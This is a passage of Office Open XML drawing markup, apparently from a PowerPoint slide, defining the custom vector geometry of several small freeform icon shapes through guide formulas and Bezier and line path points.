                  <a:gd name="T50" fmla="*/ 47 w 103"/>
                  <a:gd name="T51" fmla="*/ 46 h 103"/>
                  <a:gd name="T52" fmla="*/ 57 w 103"/>
                  <a:gd name="T53" fmla="*/ 36 h 103"/>
                  <a:gd name="T54" fmla="*/ 94 w 103"/>
                  <a:gd name="T55" fmla="*/ 97 h 103"/>
                  <a:gd name="T56" fmla="*/ 44 w 103"/>
                  <a:gd name="T57" fmla="*/ 97 h 103"/>
                  <a:gd name="T58" fmla="*/ 45 w 103"/>
                  <a:gd name="T59" fmla="*/ 51 h 103"/>
                  <a:gd name="T60" fmla="*/ 63 w 103"/>
                  <a:gd name="T61" fmla="*/ 53 h 103"/>
                  <a:gd name="T62" fmla="*/ 63 w 103"/>
                  <a:gd name="T63" fmla="*/ 33 h 103"/>
                  <a:gd name="T64" fmla="*/ 96 w 103"/>
                  <a:gd name="T65" fmla="*/ 33 h 103"/>
                  <a:gd name="T66" fmla="*/ 94 w 103"/>
                  <a:gd name="T67" fmla="*/ 9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3" h="103">
                    <a:moveTo>
                      <a:pt x="63" y="27"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="65" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="102"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="101" y="103"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="103" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="27"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="19" y="10"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="19" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="10"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="6" y="71"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="6" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="71"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="57" y="36"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="57" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="36"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="94" y="97"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="44" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="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39" name="Freeform 30">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E09A75A7-7558-4129-956C-67D1F6E4E4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53207" y="4299877"/>
                <a:ext cx="326874" cy="277941"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 76 w 102"/>
                  <a:gd name="T1" fmla="*/ 1 h 87"/>
                  <a:gd name="T2" fmla="*/ 7 w 102"/>
                  <a:gd name="T3" fmla="*/ 22 h 87"/>
                  <a:gd name="T4" fmla="*/ 1 w 102"/>
                  <a:gd name="T5" fmla="*/ 32 h 87"/>
                  <a:gd name="T6" fmla="*/ 15 w 102"/>
                  <a:gd name="T7" fmla="*/ 80 h 87"/>
                  <a:gd name="T8" fmla="*/ 26 w 102"/>
                  <a:gd name="T9" fmla="*/ 86 h 87"/>
                  <a:gd name="T10" fmla="*/ 95 w 102"/>
                  <a:gd name="T11" fmla="*/ 65 h 87"/>
                  <a:gd name="T12" fmla="*/ 101 w 102"/>
                  <a:gd name="T13" fmla="*/ 55 h 87"/>
                  <a:gd name="T14" fmla="*/ 87 w 102"/>
                  <a:gd name="T15" fmla="*/ 7 h 87"/>
                  <a:gd name="T16" fmla="*/ 76 w 102"/>
                  <a:gd name="T17" fmla="*/ 1 h 87"/>
                  <a:gd name="T18" fmla="*/ 8 w 102"/>
                  <a:gd name="T19" fmla="*/ 27 h 87"/>
                  <a:gd name="T20" fmla="*/ 78 w 102"/>
                  <a:gd name="T21" fmla="*/ 7 h 87"/>
                  <a:gd name="T22" fmla="*/ 81 w 102"/>
                  <a:gd name="T23" fmla="*/ 8 h 87"/>
                  <a:gd name="T24" fmla="*/ 84 w 102"/>
                  <a:gd name="T25" fmla="*/ 17 h 87"/>
                  <a:gd name="T26" fmla="*/ 9 w 102"/>
                  <a:gd name="T27" fmla="*/ 38 h 87"/>
                  <a:gd name="T28" fmla="*/ 7 w 102"/>
                  <a:gd name="T29" fmla="*/ 30 h 87"/>
                  <a:gd name="T30" fmla="*/ 8 w 102"/>
                  <a:gd name="T31" fmla="*/ 27 h 87"/>
                  <a:gd name="T32" fmla="*/ 94 w 102"/>
                  <a:gd name="T33" fmla="*/ 60 h 87"/>
                  <a:gd name="T34" fmla="*/ 24 w 102"/>
                  <a:gd name="T35" fmla="*/ 80 h 87"/>
                  <a:gd name="T36" fmla="*/ 21 w 102"/>
                  <a:gd name="T37" fmla="*/ 78 h 87"/>
                  <a:gd name="T38" fmla="*/ 14 w 102"/>
                  <a:gd name="T39" fmla="*/ 54 h 87"/>
                  <a:gd name="T40" fmla="*/ 88 w 102"/>
                  <a:gd name="T41" fmla="*/ 33 h 87"/>
                  <a:gd name="T42" fmla="*/ 95 w 102"/>
                  <a:gd name="T43" fmla="*/ 57 h 87"/>
                  <a:gd name="T44" fmla="*/ 94 w 102"/>
                  <a:gd name="T45" fmla="*/ 60 h 87"/>
                  <a:gd name="T46" fmla="*/ 22 w 102"/>
                  <a:gd name="T47" fmla="*/ 64 h 87"/>
                  <a:gd name="T48" fmla="*/ 27 w 102"/>
                  <a:gd name="T49" fmla="*/ 62 h 87"/>
                  <a:gd name="T50" fmla="*/ 31 w 102"/>
                  <a:gd name="T51" fmla="*/ 73 h 87"/>
                  <a:gd name="T52" fmla="*/ 25 w 102"/>
                  <a:gd name="T53" fmla="*/ 74 h 87"/>
                  <a:gd name="T54" fmla="*/ 22 w 102"/>
                  <a:gd name="T55" fmla="*/ 64 h 87"/>
                  <a:gd name="T56" fmla="*/ 33 w 102"/>
                  <a:gd name="T57" fmla="*/ 60 h 87"/>
                  <a:gd name="T58" fmla="*/ 38 w 102"/>
                  <a:gd name="T59" fmla="*/ 59 h 87"/>
                  <a:gd name="T60" fmla="*/ 41 w 102"/>
                  <a:gd name="T61" fmla="*/ 70 h 87"/>
                  <a:gd name="T62" fmla="*/ 36 w 102"/>
                  <a:gd name="T63" fmla="*/ 71 h 87"/>
                  <a:gd name="T64" fmla="*/ 33 w 102"/>
                  <a:gd name="T65" fmla="*/ 60 h 87"/>
                  <a:gd name="T66" fmla="*/ 43 w 102"/>
                  <a:gd name="T67" fmla="*/ 57 h 87"/>
                  <a:gd name="T68" fmla="*/ 49 w 102"/>
                  <a:gd name="T69" fmla="*/ 56 h 87"/>
                  <a:gd name="T70" fmla="*/ 52 w 102"/>
                  <a:gd name="T71" fmla="*/ 66 h 87"/>
                  <a:gd name="T72" fmla="*/ 47 w 102"/>
                  <a:gd name="T73" fmla="*/ 68 h 87"/>
                  <a:gd name="T74" fmla="*/ 43 w 102"/>
                  <a:gd name="T7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2" h="87">
                    <a:moveTo>
                      <a:pt x="76" y="1"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="7" y="22"/>
                      <a:pt x="7" y="22"/>
                      <a:pt x="7" y="22"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2" y="23"/>
                      <a:pt x="0" y="28"/>
                      <a:pt x="1" y="32"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="15" y="80"/>
                      <a:pt x="15" y="80"/>
                      <a:pt x="15" y="80"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="17" y="84"/>
                      <a:pt x="21" y="87"/>
                      <a:pt x="26" y="86"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="95" y="65"/>
                      <a:pt x="95" y="65"/>
                      <a:pt x="95" y="65"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="100" y="64"/>
                      <a:pt x="102" y="59"/>
                      <a:pt x="101" y="55"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="87" y="7"/>
                      <a:pt x="87" y="7"/>
                      <a:pt x="87" y="7"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="85" y="3"/>
                      <a:pt x="81" y="0"/>
                      <a:pt x="76" y="1"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="8" y="27"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="78" y="7"/>
                      <a:pt x="78" y="7"/>
                      <a:pt x="78" y="7"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="79" y="6"/>
                      <a:pt x="81" y="7"/>
                      <a:pt x="81" y="8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6" y="29"/>
                      <a:pt x="7" y="27"/>
                      <a:pt x="8" y="27"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="94" y="6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81"/>
                      <a:pt x="21" y="80"/>
                      <a:pt x="21" y="78"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="14" y="54"/>
                      <a:pt x="14" y="54"/>
                      <a:pt x="14" y="54"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="88" y="33"/>
                      <a:pt x="88" y="33"/>
                      <a:pt x="88" y="33"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="95" y="57"/>
                      <a:pt x="95" y="57"/>
                      <a:pt x="95" y="57"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="96" y="58"/>
                      <a:pt x="95" y="60"/>
                      <a:pt x="94" y="60"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="22" y="64"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="27" y="62"/>
                      <a:pt x="27" y="62"/>
                      <a:pt x="27" y="62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25" y="74"/>
                      <a:pt x="25" y="74"/>
                      <a:pt x="25" y="74"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="22" y="64"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="33" y="60"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="38" y="59"/>
                      <a:pt x="38" y="59"/>
                      <a:pt x="38" y="59"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="41" y="70"/>
                      <a:pt x="41" y="70"/>
                      <a:pt x="41" y="70"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="36" y="71"/>
                      <a:pt x="36" y="71"/>
                      <a:pt x="36" y="71"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="33" y="60"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="43" y="57"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="49" y="56"/>
                      <a:pt x="49" y="56"/>
                      <a:pt x="49" y="56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47" y="68"/>
                      <a:pt x="47" y="68"/>
                      <a:pt x="47" y="68"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="43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0" name="Freeform 31">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{996B3D81-176A-47BA-BDDA-79C962E86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74562" y="2275999"/>
                <a:ext cx="295557" cy="305343"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 65 w 92"/>
                  <a:gd name="T1" fmla="*/ 96 h 96"/>
                  <a:gd name="T2" fmla="*/ 36 w 92"/>
                  <a:gd name="T3" fmla="*/ 49 h 96"/>
                  <a:gd name="T4" fmla="*/ 36 w 92"/>
                  <a:gd name="T5" fmla="*/ 72 h 96"/>
                  <a:gd name="T6" fmla="*/ 0 w 92"/>
                  <a:gd name="T7" fmla="*/ 36 h 96"/>
                  <a:gd name="T8" fmla="*/ 36 w 92"/>
                  <a:gd name="T9" fmla="*/ 0 h 96"/>
                  <a:gd name="T10" fmla="*/ 36 w 92"/>
                  <a:gd name="T11" fmla="*/ 24 h 96"/>
                  <a:gd name="T12" fmla="*/ 65 w 92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6">
                    <a:moveTo>
                      <a:pt x="65" y="96"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="76" y="77"/>
                      <a:pt x="78" y="48"/>
                      <a:pt x="36" y="49"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="36" y="72"/>
                      <a:pt x="36" y="72"/>
                      <a:pt x="36" y="7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86" y="22"/>
                      <a:pt x="92" y="68"/>
                      <a:pt x="65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1" name="Freeform 32">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{53C80BDC-AFFB-47E3-BC4F-2F47316DF6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88439" y="2508922"/>
                <a:ext cx="275984" cy="195733"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 70 w 86"/>
                  <a:gd name="T1" fmla="*/ 58 h 61"/>
                  <a:gd name="T2" fmla="*/ 75 w 86"/>
                  <a:gd name="T3" fmla="*/ 49 h 61"/>
                  <a:gd name="T4" fmla="*/ 80 w 86"/>
                  <a:gd name="T5" fmla="*/ 41 h 61"/>
                  <a:gd name="T6" fmla="*/ 85 w 86"/>
                  <a:gd name="T7" fmla="*/ 32 h 61"/>
                  <a:gd name="T8" fmla="*/ 83 w 86"/>
                  <a:gd name="T9" fmla="*/ 25 h 61"/>
                  <a:gd name="T10" fmla="*/ 65 w 86"/>
                  <a:gd name="T11" fmla="*/ 9 h 61"/>
                  <a:gd name="T12" fmla="*/ 58 w 86"/>
                  <a:gd name="T13" fmla="*/ 9 h 61"/>
                  <a:gd name="T14" fmla="*/ 50 w 86"/>
                  <a:gd name="T15" fmla="*/ 17 h 61"/>
                  <a:gd name="T16" fmla="*/ 49 w 86"/>
                  <a:gd name="T17" fmla="*/ 18 h 61"/>
                  <a:gd name="T18" fmla="*/ 17 w 86"/>
                  <a:gd name="T19" fmla="*/ 0 h 61"/>
                  <a:gd name="T20" fmla="*/ 0 w 86"/>
                  <a:gd name="T21" fmla="*/ 3 h 61"/>
                  <a:gd name="T22" fmla="*/ 4 w 86"/>
                  <a:gd name="T23" fmla="*/ 16 h 61"/>
                  <a:gd name="T24" fmla="*/ 9 w 86"/>
                  <a:gd name="T25" fmla="*/ 15 h 61"/>
                  <a:gd name="T26" fmla="*/ 11 w 86"/>
                  <a:gd name="T27" fmla="*/ 24 h 61"/>
                  <a:gd name="T28" fmla="*/ 20 w 86"/>
                  <a:gd name="T29" fmla="*/ 21 h 61"/>
                  <a:gd name="T30" fmla="*/ 23 w 86"/>
                  <a:gd name="T31" fmla="*/ 30 h 61"/>
                  <a:gd name="T32" fmla="*/ 32 w 86"/>
                  <a:gd name="T33" fmla="*/ 27 h 61"/>
                  <a:gd name="T34" fmla="*/ 35 w 86"/>
                  <a:gd name="T35" fmla="*/ 36 h 61"/>
                  <a:gd name="T36" fmla="*/ 39 w 86"/>
                  <a:gd name="T37" fmla="*/ 35 h 61"/>
                  <a:gd name="T38" fmla="*/ 39 w 86"/>
                  <a:gd name="T39" fmla="*/ 36 h 61"/>
                  <a:gd name="T40" fmla="*/ 37 w 86"/>
                  <a:gd name="T41" fmla="*/ 47 h 61"/>
                  <a:gd name="T42" fmla="*/ 41 w 86"/>
                  <a:gd name="T43" fmla="*/ 53 h 61"/>
                  <a:gd name="T44" fmla="*/ 64 w 86"/>
                  <a:gd name="T45" fmla="*/ 61 h 61"/>
                  <a:gd name="T46" fmla="*/ 70 w 86"/>
                  <a:gd name="T47" fmla="*/ 58 h 61"/>
                  <a:gd name="T48" fmla="*/ 15 w 86"/>
                  <a:gd name="T49" fmla="*/ 10 h 61"/>
                  <a:gd name="T50" fmla="*/ 18 w 86"/>
                  <a:gd name="T51" fmla="*/ 6 h 61"/>
                  <a:gd name="T52" fmla="*/ 46 w 86"/>
                  <a:gd name="T53" fmla="*/ 21 h 61"/>
                  <a:gd name="T54" fmla="*/ 43 w 86"/>
                  <a:gd name="T55" fmla="*/ 25 h 61"/>
                  <a:gd name="T56" fmla="*/ 15 w 86"/>
                  <a:gd name="T57" fmla="*/ 10 h 61"/>
                  <a:gd name="T58" fmla="*/ 61 w 86"/>
                  <a:gd name="T59" fmla="*/ 54 h 61"/>
                  <a:gd name="T60" fmla="*/ 57 w 86"/>
                  <a:gd name="T61" fmla="*/ 52 h 61"/>
                  <a:gd name="T62" fmla="*/ 56 w 86"/>
                  <a:gd name="T63" fmla="*/ 49 h 61"/>
                  <a:gd name="T64" fmla="*/ 69 w 86"/>
                  <a:gd name="T65" fmla="*/ 24 h 61"/>
                  <a:gd name="T66" fmla="*/ 72 w 86"/>
                  <a:gd name="T67" fmla="*/ 23 h 61"/>
                  <a:gd name="T68" fmla="*/ 77 w 86"/>
                  <a:gd name="T69" fmla="*/ 26 h 61"/>
                  <a:gd name="T70" fmla="*/ 77 w 86"/>
                  <a:gd name="T71" fmla="*/ 29 h 61"/>
                  <a:gd name="T72" fmla="*/ 64 w 86"/>
                  <a:gd name="T73" fmla="*/ 53 h 61"/>
                  <a:gd name="T74" fmla="*/ 61 w 86"/>
                  <a:gd name="T75" fmla="*/ 5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" h="61">
                    <a:moveTo>
                      <a:pt x="70" y="58"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="75" y="49"/>
                      <a:pt x="75" y="49"/>
                      <a:pt x="75" y="49"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="77" y="47"/>
                      <a:pt x="79" y="43"/>
                      <a:pt x="80" y="41"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="85" y="32"/>
                      <a:pt x="85" y="32"/>
                      <a:pt x="85" y="32"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="86" y="29"/>
                      <a:pt x="85" y="26"/>
                      <a:pt x="83" y="25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3" y="7"/>
                      <a:pt x="60" y="8"/>
                      <a:pt x="58" y="9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49" y="17"/>
                      <a:pt x="49" y="18"/>
                      <a:pt x="49" y="18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9" y="35"/>
                      <a:pt x="39" y="35"/>
                      <a:pt x="39" y="35"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="39" y="35"/>
                      <a:pt x="39" y="36"/>
                      <a:pt x="39" y="36"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="37" y="47"/>
                      <a:pt x="37" y="47"/>
                      <a:pt x="37" y="47"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="37" y="50"/>
                      <a:pt x="38" y="53"/>
                      <a:pt x="41" y="53"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="64" y="61"/>
                      <a:pt x="64" y="61"/>
                      <a:pt x="64" y="61"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="66" y="61"/>
                      <a:pt x="69" y="60"/>
                      <a:pt x="70" y="58"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="15" y="10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3" y="25"/>
                      <a:pt x="43" y="25"/>
                      <a:pt x="43" y="25"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="15" y="10"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="61" y="54"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="57" y="52"/>
                      <a:pt x="57" y="52"/>
                      <a:pt x="57" y="52"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="56" y="51"/>
                      <a:pt x="55" y="50"/>
                      <a:pt x="56" y="49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70" y="23"/>
                      <a:pt x="71" y="23"/>
                      <a:pt x="72" y="23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8" y="26"/>
                      <a:pt x="78" y="28"/>
                      <a:pt x="77" y="2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64" y="54"/>
                      <a:pt x="62" y="55"/>
                      <a:pt x="61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2" name="Freeform 33">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{548A9F70-91CC-4070-9295-9B2CC7339D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96621" y="4129590"/>
                <a:ext cx="221179" cy="191818"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 56 w 69"/>
                  <a:gd name="T1" fmla="*/ 0 h 60"/>
                  <a:gd name="T2" fmla="*/ 13 w 69"/>
                  <a:gd name="T3" fmla="*/ 0 h 60"/>
                  <a:gd name="T4" fmla="*/ 0 w 69"/>
                  <a:gd name="T5" fmla="*/ 13 h 60"/>
                  <a:gd name="T6" fmla="*/ 0 w 69"/>
                  <a:gd name="T7" fmla="*/ 58 h 60"/>
                  <a:gd name="T8" fmla="*/ 2 w 69"/>
                  <a:gd name="T9" fmla="*/ 60 h 60"/>
                  <a:gd name="T10" fmla="*/ 66 w 69"/>
                  <a:gd name="T11" fmla="*/ 60 h 60"/>
                  <a:gd name="T12" fmla="*/ 69 w 69"/>
                  <a:gd name="T13" fmla="*/ 58 h 60"/>
                  <a:gd name="T14" fmla="*/ 69 w 69"/>
                  <a:gd name="T15" fmla="*/ 13 h 60"/>
                  <a:gd name="T16" fmla="*/ 56 w 69"/>
                  <a:gd name="T17" fmla="*/ 0 h 60"/>
                  <a:gd name="T18" fmla="*/ 34 w 69"/>
                  <a:gd name="T19" fmla="*/ 51 h 60"/>
                  <a:gd name="T20" fmla="*/ 13 w 69"/>
                  <a:gd name="T21" fmla="*/ 34 h 60"/>
                  <a:gd name="T22" fmla="*/ 26 w 69"/>
                  <a:gd name="T23" fmla="*/ 34 h 60"/>
                  <a:gd name="T24" fmla="*/ 26 w 69"/>
                  <a:gd name="T25" fmla="*/ 21 h 60"/>
                  <a:gd name="T26" fmla="*/ 43 w 69"/>
                  <a:gd name="T27" fmla="*/ 21 h 60"/>
                  <a:gd name="T28" fmla="*/ 43 w 69"/>
                  <a:gd name="T29" fmla="*/ 34 h 60"/>
                  <a:gd name="T30" fmla="*/ 56 w 69"/>
                  <a:gd name="T31" fmla="*/ 34 h 60"/>
                  <a:gd name="T32" fmla="*/ 34 w 69"/>
                  <a:gd name="T33" fmla="*/ 51 h 60"/>
                  <a:gd name="T34" fmla="*/ 10 w 69"/>
                  <a:gd name="T35" fmla="*/ 9 h 60"/>
                  <a:gd name="T36" fmla="*/ 15 w 69"/>
                  <a:gd name="T37" fmla="*/ 4 h 60"/>
                  <a:gd name="T38" fmla="*/ 54 w 69"/>
                  <a:gd name="T39" fmla="*/ 4 h 60"/>
                  <a:gd name="T40" fmla="*/ 58 w 69"/>
                  <a:gd name="T41" fmla="*/ 9 h 60"/>
                  <a:gd name="T42" fmla="*/ 10 w 69"/>
                  <a:gd name="T43" fmla="*/ 9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9" h="60">
                    <a:moveTo>
                      <a:pt x="56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9"/>
                      <a:pt x="1" y="60"/>
                      <a:pt x="2" y="60"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="66" y="60"/>
                      <a:pt x="66" y="60"/>
                      <a:pt x="66" y="60"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="68" y="60"/>
                      <a:pt x="69" y="59"/>
                      <a:pt x="69" y="58"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="69" y="13"/>
                      <a:pt x="69" y="13"/>
                      <a:pt x="69" y="13"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="56" y="0"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="34" y="51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43" y="21"/>
                      <a:pt x="43" y="21"/>
                      <a:pt x="43" y="21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56" y="34"/>
                      <a:pt x="56" y="34"/>
                      <a:pt x="56" y="34"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="34" y="51"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="10" y="9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8" y="9"/>
                      <a:pt x="58" y="9"/>
                      <a:pt x="58" y="9"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="1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3" name="Freeform 34">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2F4A7069-319C-41C8-B2AF-D901F96761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03921" y="2003931"/>
                <a:ext cx="182032" cy="248580"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 57 w 57"/>
                  <a:gd name="T1" fmla="*/ 48 h 78"/>
                  <a:gd name="T2" fmla="*/ 57 w 57"/>
                  <a:gd name="T3" fmla="*/ 48 h 78"/>
                  <a:gd name="T4" fmla="*/ 57 w 57"/>
                  <a:gd name="T5" fmla="*/ 48 h 78"/>
                  <a:gd name="T6" fmla="*/ 28 w 57"/>
                  <a:gd name="T7" fmla="*/ 0 h 78"/>
                  <a:gd name="T8" fmla="*/ 0 w 57"/>
                  <a:gd name="T9" fmla="*/ 48 h 78"/>
                  <a:gd name="T10" fmla="*/ 0 w 57"/>
                  <a:gd name="T11" fmla="*/ 48 h 78"/>
                  <a:gd name="T12" fmla="*/ 0 w 57"/>
                  <a:gd name="T13" fmla="*/ 48 h 78"/>
                  <a:gd name="T14" fmla="*/ 0 w 57"/>
                  <a:gd name="T15" fmla="*/ 49 h 78"/>
                  <a:gd name="T16" fmla="*/ 0 w 57"/>
                  <a:gd name="T17" fmla="*/ 49 h 78"/>
                  <a:gd name="T18" fmla="*/ 0 w 57"/>
                  <a:gd name="T19" fmla="*/ 49 h 78"/>
                  <a:gd name="T20" fmla="*/ 28 w 57"/>
                  <a:gd name="T21" fmla="*/ 78 h 78"/>
                  <a:gd name="T22" fmla="*/ 57 w 57"/>
                  <a:gd name="T23" fmla="*/ 49 h 78"/>
                  <a:gd name="T24" fmla="*/ 57 w 57"/>
                  <a:gd name="T25" fmla="*/ 49 h 78"/>
                  <a:gd name="T26" fmla="*/ 57 w 57"/>
                  <a:gd name="T27" fmla="*/ 49 h 78"/>
                  <a:gd name="T28" fmla="*/ 57 w 57"/>
                  <a:gd name="T29" fmla="*/ 48 h 78"/>
                  <a:gd name="T30" fmla="*/ 48 w 57"/>
                  <a:gd name="T31" fmla="*/ 49 h 78"/>
                  <a:gd name="T32" fmla="*/ 48 w 57"/>
                  <a:gd name="T33" fmla="*/ 49 h 78"/>
                  <a:gd name="T34" fmla="*/ 42 w 57"/>
                  <a:gd name="T35" fmla="*/ 62 h 78"/>
                  <a:gd name="T36" fmla="*/ 28 w 57"/>
                  <a:gd name="T37" fmla="*/ 68 h 78"/>
                  <a:gd name="T38" fmla="*/ 26 w 57"/>
                  <a:gd name="T39" fmla="*/ 68 h 78"/>
                  <a:gd name="T40" fmla="*/ 43 w 57"/>
                  <a:gd name="T41" fmla="*/ 37 h 78"/>
                  <a:gd name="T42" fmla="*/ 43 w 57"/>
                  <a:gd name="T43" fmla="*/ 33 h 78"/>
                  <a:gd name="T44" fmla="*/ 48 w 57"/>
                  <a:gd name="T45" fmla="*/ 48 h 78"/>
                  <a:gd name="T46" fmla="*/ 48 w 57"/>
                  <a:gd name="T47" fmla="*/ 48 h 78"/>
                  <a:gd name="T48" fmla="*/ 48 w 57"/>
                  <a:gd name="T49" fmla="*/ 48 h 78"/>
                  <a:gd name="T50" fmla="*/ 48 w 57"/>
                  <a:gd name="T51" fmla="*/ 48 h 78"/>
                  <a:gd name="T52" fmla="*/ 48 w 57"/>
                  <a:gd name="T53" fmla="*/ 49 h 78"/>
                  <a:gd name="T54" fmla="*/ 48 w 57"/>
                  <a:gd name="T55" fmla="*/ 4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" h="78">
                    <a:moveTo>
                      <a:pt x="57" y="48"/>
                    </a:move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24"/>
